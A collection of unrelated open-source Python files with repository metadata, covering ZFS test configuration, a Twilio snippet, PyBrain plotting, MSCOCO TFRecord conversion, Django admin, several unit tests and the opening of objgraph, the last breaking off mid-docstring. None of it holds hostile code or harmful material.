config.read('config.cfg')
main_pool = config.get('perf_tests', 'main_pool')
# zfs filesystems start with a pool name and have their paths seperated by
# forward slashes
test_filesystem_path = main_pool + '/' + config.get('perf_tests', 'test_filesystem')
# This will be the full path to the file that will be zfs received during the
# tests.
test_file_full_path = config.get('perf_tests', 'test_file')
# The directory the tests will occur in.
mount_point = config.get('perf_tests', 'mount_point')
# The directory to place logs in.
log_directory = config.get('perf_tests', 'log_directory')
# The directory to put starting and ending results in
results_directory = config.get('perf_tests', 'results_directory')
# The directory for runnings system statistics during a run
stats_directory = config.get('perf_tests', 'stats_directory')
| {
"content_hash": "0eda528ceb3c4469fc9b6d1fd0f71b35",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 84,
"avg_line_length": 34.42307692307692,
"alnum_prop": 0.7418994413407821,
"repo_name": "stevenburgess/zfs-tests",
"id": "be875fdb1a09e4a4919d2e6ed8288270ec83e585",
"size": "895",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Configs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19204"
}
],
"symlink_target": ""
} |
from twilio.rest import TwilioRestClient
# Your Account Sid and Auth Token from twilio.com/user/account
account_sid = "ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
auth_token = "your_auth_token"
client = TwilioRestClient(account_sid, auth_token)
# A list of account objects with the properties described above
accounts = client.accounts.list(status="active")
| {
"content_hash": "3375b5d6bf3e0e45ffae9a93c5b90167",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 63,
"avg_line_length": 39.111111111111114,
"alnum_prop": 0.8039772727272727,
"repo_name": "teoreteetik/api-snippets",
"id": "b695abdf90b18e3460813128bf600d8cbe396efa",
"size": "425",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rest/accounts/list-get-example-2/list-get-example-2.5.x.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "643369"
},
{
"name": "HTML",
"bytes": "335"
},
{
"name": "Java",
"bytes": "943336"
},
{
"name": "JavaScript",
"bytes": "539577"
},
{
"name": "M",
"bytes": "117"
},
{
"name": "Mathematica",
"bytes": "93"
},
{
"name": "Objective-C",
"bytes": "46198"
},
{
"name": "PHP",
"bytes": "538312"
},
{
"name": "Python",
"bytes": "467248"
},
{
"name": "Ruby",
"bytes": "470316"
},
{
"name": "Shell",
"bytes": "1564"
},
{
"name": "Swift",
"bytes": "36563"
}
],
"symlink_target": ""
} |
__author__ = 'Thomas Rueckstiess, ruecksti@in.tum.de'
from pylab import plot, figure, ion, Line2D, draw, arange #@UnresolvedImport
from pybrain.rl.environments.renderer import Renderer
import threading
import time
class SimpleRenderer(Renderer):
def __init__(self):
Renderer.__init__(self)
self.dataLock = threading.Lock()
self.stopRequest = False
self.pathx = []
self.pathy = []
self.f = None
self.min = -1
self.max = 1
self.fig = None
self.color = 'red'
def setFunction(self, f, rmin, rmax):
self.dataLock.acquire()
self.f = f
self.min = rmin
self.max = rmax
self.dataLock.release()
def updateData(self, data):
self.dataLock.acquire()
(x, y) = data
self.pathx.append(x)
self.pathy.append(y)
self.dataLock.release()
def reset(self):
self.dataLock.acquire()
self.pathx = []
self.pathy = []
self.dataLock.release()
def stop(self):
self.dataLock.acquire()
self.stopRequest = True
self.dataLock.release()
def start(self):
self.drawPlot()
Renderer.start(self)
def drawPlot(self):
ion()
self.fig = figure()
axes = self.fig.add_subplot(111)
# draw function
xvalues = arange(self.min, self.max, 0.1)
yvalues = map(self.f, xvalues)
plot(xvalues, yvalues)
# draw exploration path
self.line = Line2D([], [], linewidth=3, color='red')
axes.add_artist(self.line)
self.line.set_clip_box(axes.bbox)
# set axes limits
axes.set_xlim(min(xvalues)-0.5, max(xvalues)+0.5)
axes.set_ylim(min(yvalues)-0.5, max(yvalues)+0.5)
def _render(self):
while not self.stopRequest:
self.dataLock.acquire()
self.line.set_data(self.pathx, self.pathy)
self.line.set_color(self.color)
figure(self.fig.number)
draw()
self.dataLock.release()
time.sleep(0.05)
self.stopRequest = False
| {
"content_hash": "6d97499c3be10ea3dcc04f05789744c3",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 76,
"avg_line_length": 27.8125,
"alnum_prop": 0.5420224719101123,
"repo_name": "daanwierstra/pybrain",
"id": "7be0a6dec36c84ac56dfb03958b8f7e504689594",
"size": "2225",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pybrain/rl/environments/simple/renderer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "380415"
},
{
"name": "Python",
"bytes": "1279804"
},
{
"name": "Shell",
"bytes": "121"
}
],
"symlink_target": ""
} |
class PublicationFailed(Exception):
pass
| {
"content_hash": "8a11586414937d6530aa0b201a541d56",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 35,
"avg_line_length": 22.5,
"alnum_prop": 0.7777777777777778,
"repo_name": "ONSdigital/eq-survey-runner",
"id": "d3a05faaadf1d86f12d9704bf4885fe804ee0a07",
"size": "45",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/publisher/exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "520"
},
{
"name": "HTML",
"bytes": "236859"
},
{
"name": "JavaScript",
"bytes": "423942"
},
{
"name": "Python",
"bytes": "1409591"
},
{
"name": "SCSS",
"bytes": "25858"
},
{
"name": "Shell",
"bytes": "10196"
}
],
"symlink_target": ""
} |
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path
import random
import sys
import threading
from collections import Counter
from collections import namedtuple
from datetime import datetime
import nltk.tokenize
import numpy as np
import tensorflow as tf
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
"Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
"Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json",
"Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["image_id", "filename", "captions"])
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, vocab, unk_id):
"""Initializes the vocabulary.
Args:
vocab: A dictionary of word to word_id.
unk_id: Id of the special 'unknown' word.
"""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
"""Returns the integer id of a word string."""
if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""Helper class for decoding images in TensorFlow."""
def __init__(self):
# Create a single TensorFlow Session for all image decoding calls.
self._sess = tf.Session()
# TensorFlow ops for JPEG decoding.
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""Builds a SequenceExample proto for an image-caption pair.
Args:
image: An ImageMetadata object.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
Returns:
A SequenceExample proto.
"""
with tf.gfile.FastGFile(image.filename, "r") as f:
encoded_image = f.read()
try:
decoder.decode_jpeg(encoded_image)
except (tf.errors.InvalidArgumentError, AssertionError):
print("Skipping file with invalid JPEG data: %s" % image.filename)
return
context = tf.train.Features(feature={
"image/image_id": _int64_feature(image.image_id),
"image/data": _bytes_feature(encoded_image),
})
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption": _bytes_feature_list(caption),
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(
context=context, feature_lists=feature_lists)
return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
num_shards):
"""Processes and saves a subset of images as TFRecord files in one thread.
Args:
thread_index: Integer thread identifier within [0, len(ranges)].
ranges: A list of pairs of integers specifying the ranges of the dataset to
process in parallel.
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Each thread produces N shards where N = num_shards / num_threads. For
# instance, if num_shards = 128, and num_threads = 2, then the first thread
# would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
writer.close()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
"""Processes a complete data set and saves it as a TFRecord.
Args:
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Break up each image into a separate entity for each caption.
images = [ImageMetadata(image.image_id, image.filename, [caption])
for image in images for caption in image.captions]
# Shuffle the ordering of images. Make the randomization repeatable.
random.seed(12345)
random.shuffle(images)
# Break the images into num_threads batches. Batch i is defined as
# images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in xrange(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
(datetime.now(), len(images), name))
def _create_vocab(captions):
"""Creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word counts. The id of each
word in the file is its corresponding 0-based line number.
Args:
captions: A list of lists of strings.
Returns:
A Vocabulary object.
"""
print("Creating vocabulary.")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# Filter uncommon words and sort by descending count.
word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("Words in vocabulary:", len(word_counts))
# Write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
# Create the vocabulary dictionary.
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
"""Loads image metadata from a JSON file and processes the captions.
Args:
captions_file: JSON file containing caption annotations.
image_dir: Directory containing the image files.
Returns:
A list of ImageMetadata.
"""
with tf.gfile.FastGFile(captions_file, "r") as f:
caption_data = json.load(f)
# Extract the filenames.
id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
# Extract the captions. Each image_id is associated with multiple captions.
id_to_captions = {}
for annotation in caption_data["annotations"]:
image_id = annotation["image_id"]
caption = annotation["caption"]
id_to_captions.setdefault(image_id, [])
id_to_captions[image_id].append(caption)
assert len(id_to_filename) == len(id_to_captions)
assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
print("Loaded caption metadata for %d images from %s" %
(len(id_to_filename), captions_file))
# Process the captions and combine the data into a list of ImageMetadata.
print("Processing captions.")
image_metadata = []
num_captions = 0
for image_id, base_filename in id_to_filename:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in id_to_captions[image_id]]
image_metadata.append(ImageMetadata(image_id, filename, captions))
num_captions += len(captions)
print("Finished processing %d captions for %d images in %s" %
(num_captions, len(id_to_filename), captions_file))
return image_metadata
def main(unused_argv):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
FLAGS.train_image_dir)
mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
FLAGS.val_image_dir)
# Redistribute the MSCOCO data as follows:
# train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
# val_dataset = 5% of mscoco_val_dataset (for validation during training).
# test_dataset = 10% of mscoco_val_dataset (for final evaluation).
train_cutoff = int(0.85 * len(mscoco_val_dataset))
val_cutoff = int(0.90 * len(mscoco_val_dataset))
train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
test_dataset = mscoco_val_dataset[val_cutoff:]
# Create vocabulary from the training captions.
train_captions = [c for image in train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
tf.app.run()
| {
"content_hash": "439b0910cf7347eff272232598493424",
"timestamp": "",
"source": "github",
"line_count": 466,
"max_line_length": 84,
"avg_line_length": 37.51716738197425,
"alnum_prop": 0.6609849568151919,
"repo_name": "MeteorKepler/RICGA",
"id": "d3f422f754d71886d52977f571eba39997a21645",
"size": "18172",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ricga/data/build_mscoco_data.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "942566"
},
{
"name": "Python",
"bytes": "188498"
},
{
"name": "Shell",
"bytes": "3042"
}
],
"symlink_target": ""
} |
import json
from .visualization_user_query import visualization_user_query
from SBaaS_base.sbaas_template_io import sbaas_template_io
# Resources
from io_utilities.base_importData import base_importData
from io_utilities.base_exportData import base_exportData
from ddt_python.ddt_container import ddt_container
class visualization_user_io(visualization_user_query,sbaas_template_io):
def import_visualizationUser_add(self, filename):
'''table adds'''
data = base_importData();
data.read_csv(filename);
data.format_data();
self.add_visualizationUser(data.data);
data.clear_data();
def import_visualizationUser_update(self, filename):
'''table adds'''
data = base_importData();
data.read_csv(filename);
data.format_data();
self.update_visualizationUser(data.data);
data.clear_data();
| {
"content_hash": "39d244bd590a44031ad50c10787f31c9",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 72,
"avg_line_length": 35.56,
"alnum_prop": 0.6996625421822272,
"repo_name": "dmccloskey/SBaaS_visualization",
"id": "c3f6afe75097403ac5d6fd168e30b96ff83c0e9f",
"size": "898",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SBaaS_visualization/visualization_user_io.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "78694"
}
],
"symlink_target": ""
} |
from pyroman.document import Document
from pyroman.page import Page, Layout
from pyroman.box import Box
from pyroman.paragraph import Paragraph
from pyroman.construct import Construct
import pyroman.json as json
from pyroman.pdf.dimension import A4, MarginDefault
from tests.fixture import a4doc
from pyroman.parameters import defaults
#from pyroman.pdf.dimension import A4
class TestDocument:
""" Test that the basic hierachy is working """
def test_hierarchy(self):
page_width, page_height = A4
document = Document({
'width': page_width,
'height': page_height
})
assert document.width == page_width
assert document.height == page_height
document.margin = MarginDefault
assert document.margin_top == MarginDefault[0]
assert document.margin_right == MarginDefault[1]
assert document.margin_bottom == MarginDefault[2]
assert document.margin_left == MarginDefault[3]
page = Page(document)
layout = Layout()
layout.define_area(
'main',
(page.margin_left, page.margin_top),
(page.width - page.margin_right, page.height - page.margin_bottom))
page.layout = layout
document.append(page)
assert page.width == page_width
assert page_height == page_height
box = Box(document, page, {
'box-class': 'main',
})
page.append(box)
assert box.y == MarginDefault[0] # top
assert box.x == MarginDefault[3] # left
assert box.width == page_width - MarginDefault[1] - MarginDefault[3]
assert box.height == page_height - MarginDefault[0] - MarginDefault[2]
""" Test that a Construct acts as a paragraph """
def test_construct(self):
document, page, box = a4doc()
construct = Construct(document, box)
construct.height = 200
box.append(construct)
p1 = Paragraph(document, construct, defaults.get('text'))
p1.content = "some text in a paragraph in a construct"
construct.append(p1)
box.calculate()
print(json.dumph(document))
# must actually test stuff here
| {
"content_hash": "286e1c928404dbc40481bf81120cc0d4",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 79,
"avg_line_length": 31.65714285714286,
"alnum_prop": 0.6331227436823105,
"repo_name": "eblade/pyroman2",
"id": "fcd33da800edad60568694962958a5f82d07469e",
"size": "2216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_document.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "100465"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from snippets.models import Snippet
class SnippetAdmin(admin.ModelAdmin):
pass
admin.site.register(Snippet, SnippetAdmin) | {
"content_hash": "71cacc87baa7fa47161121bd39be166e",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 42,
"avg_line_length": 20.125,
"alnum_prop": 0.8136645962732919,
"repo_name": "rishatsharafiev/crm",
"id": "6138c2e8a9e99b4482b676fb8f493355d2642f0c",
"size": "186",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project/snippets/admin.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""Tests for tensor2tensor.envs.time_step."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.envs import time_step
import tensorflow.compat.v1 as tf
class TimeStepTest(tf.test.TestCase):
def test_create_time_step(self):
ts = time_step.TimeStep.create_time_step(
observation=1, done=True, raw_reward=1.0, processed_reward=1, action=1,
info={1: 1, 2: 4})
self.assertEqual(1, ts.observation)
self.assertTrue(ts.done)
self.assertNear(1.0, ts.raw_reward, 1e-6)
self.assertEqual(1, ts.processed_reward)
self.assertEqual(1, ts.action)
self.assertEqual({1: 1, 2: 4}, ts.info)
def test_replace(self):
ts = time_step.TimeStep.create_time_step(observation=1, action=1)
self.assertFalse(ts.done)
tsr = ts.replace(action=2, done=True, info={1: 1, 2: 4})
# Asert that ts didn't change.
self.assertFalse(ts.done)
self.assertEqual(1, ts.observation)
self.assertEqual(1, ts.action)
# But tsr is as expected.
self.assertTrue(tsr.done)
self.assertEqual(1, tsr.observation) # unchanged
self.assertEqual(2, tsr.action) # changed
self.assertEqual({1: 1, 2: 4}, tsr.info)
if __name__ == '__main__':
tf.test.main()
| {
"content_hash": "912f460accde9e7e467a3ec762c63e89",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 79,
"avg_line_length": 28.555555555555557,
"alnum_prop": 0.6747081712062257,
"repo_name": "tensorflow/tensor2tensor",
"id": "98476bb219027439d65cc77414ad6b3e89b65abf",
"size": "1891",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensor2tensor/envs/time_step_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "32015"
},
{
"name": "HTML",
"bytes": "34684"
},
{
"name": "JavaScript",
"bytes": "78408"
},
{
"name": "Jupyter Notebook",
"bytes": "2859453"
},
{
"name": "Python",
"bytes": "5109255"
},
{
"name": "Shell",
"bytes": "11941"
}
],
"symlink_target": ""
} |
"""
Tools for drawing Python object reference graphs with graphviz.
You can find documentation online at https://mg.pov.lt/objgraph/
Copyright (c) 2008-2017 Marius Gedminas <marius@pov.lt> and contributors
Released under the MIT licence.
"""
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import print_function
import codecs
import collections
import gc
import inspect
import itertools
import operator
import os
import re
import subprocess
import sys
import tempfile
import types
try:
# Python 2.x compatibility
from StringIO import StringIO
except ImportError: # pragma: PY3
from io import StringIO
try:
from types import InstanceType
except ImportError: # pragma: PY3
# Python 3.x compatibility
InstanceType = None
__author__ = "Marius Gedminas (marius@gedmin.as)"
__copyright__ = "Copyright (c) 2008-2017 Marius Gedminas and contributors"
__license__ = "MIT"
__version__ = '3.5.1.dev0'
__date__ = '2020-10-11'
try:
basestring
except NameError: # pragma: PY3
# Python 3.x compatibility
basestring = str
try:
iteritems = dict.iteritems
except AttributeError: # pragma: PY3
# Python 3.x compatibility
iteritems = dict.items
IS_INTERACTIVE = False
try: # pragma: nocover
import graphviz
if 'TerminalInteractiveShell' not in get_ipython().__class__.__name__:
# So far I know two shells where it's inappropriate to use inline
# graphics, because they're text only:
# - ipython uses a TerminalInteractiveShell
# - pycharm's console uses PyDevTerminalInteractiveShell
IS_INTERACTIVE = True
except (NameError, ImportError):
pass
def _isinstance(object, classinfo):
"""Return whether an object is an instance of a class or its subclass.
Differs from the builtin isinstance() implementation in that it does not
depend on the ``__class__`` attribute which is proxied by
mock.Mock(spec=...).
"""
return issubclass(type(object), classinfo)
def count(typename, objects=None):
"""Count objects tracked by the garbage collector with a given class name.
The class name can optionally be fully qualified.
Example:
>>> count('dict')
42
>>> count('mymodule.MyClass')
2
.. note::
The Python garbage collector does not track simple
objects like int or str. See
https://docs.python.org/3/library/gc.html#gc.is_tracked
for more information.
Instead of looking through all objects tracked by the GC, you may
specify your own collection, e.g.
>>> count('MyClass', get_leaking_objects())
3
See also: :func:`get_leaking_objects`.
.. versionchanged:: 1.7
New parameter: ``objects``.
.. versionchanged:: 1.8
Accepts fully-qualified type names (i.e. 'package.module.ClassName')
as well as short type names (i.e. 'ClassName').
"""
if objects is None:
objects = gc.get_objects()
try:
if '.' in typename:
return sum(1 for o in objects if _long_typename(o) == typename)
else:
return sum(1 for o in objects if _short_typename(o) == typename)
finally:
del objects # clear cyclic references to frame
def typestats(objects=None, shortnames=True, filter=None):
"""Count the number of instances for each type tracked by the GC.
Note that the GC does not track simple objects like int or str.
Note that classes with the same name but defined in different modules
will be lumped together if ``shortnames`` is True.
If ``filter`` is specified, it should be a function taking one argument and
returning a boolean. Objects for which ``filter(obj)`` returns ``False``
will be ignored.
Example:
>>> typestats()
{'list': 12041, 'tuple': 10245, ...}
>>> typestats(get_leaking_objects())
{'MemoryError': 1, 'tuple': 2795, 'RuntimeError': 1, 'list': 47, ...}
.. versionadded:: 1.1
.. versionchanged:: 1.7
New parameter: ``objects``.
.. versionchanged:: 1.8
New parameter: ``shortnames``.
.. versionchanged:: 3.1.3
New parameter: ``filter``.
"""
if objects is None:
objects = gc.get_objects()
try:
if shortnames:
typename = _short_typename
else:
typename = _long_typename
stats = {}
for o in objects:
if filter and not filter(o):
continue
n = typename(o)
stats[n] = stats.get(n, 0) + 1
return stats
finally:
del objects # clear cyclic references to frame
def most_common_types(limit=10, objects=None, shortnames=True, filter=None):
"""Count the names of types with the most instances.
Returns a list of (type_name, count), sorted most-frequent-first.
Limits the return value to at most ``limit`` items. You may set ``limit``
to None to avoid that.
If ``filter`` is specified, it should be a function taking one argument and
returning a boolean. Objects for which ``filter(obj)`` returns ``False``
will be ignored.
The caveats documented in :func:`typestats` apply.
Example:
>>> most_common_types(limit=2)
[('list', 12041), ('tuple', 10245)]
.. versionadded:: 1.4
.. versionchanged:: 1.7
New parameter: ``objects``.
.. versionchanged:: 1.8
New parameter: ``shortnames``.
.. versionchanged:: 3.1.3
New parameter: ``filter``.
"""
stats = sorted(
typestats(objects, shortnames=shortnames, filter=filter).items(),
key=operator.itemgetter(1), reverse=True)
if limit:
stats = stats[:limit]
return stats
def show_most_common_types(
limit=10,
objects=None,
shortnames=True,
file=None,
filter=None):
"""Print the table of types of most common instances.
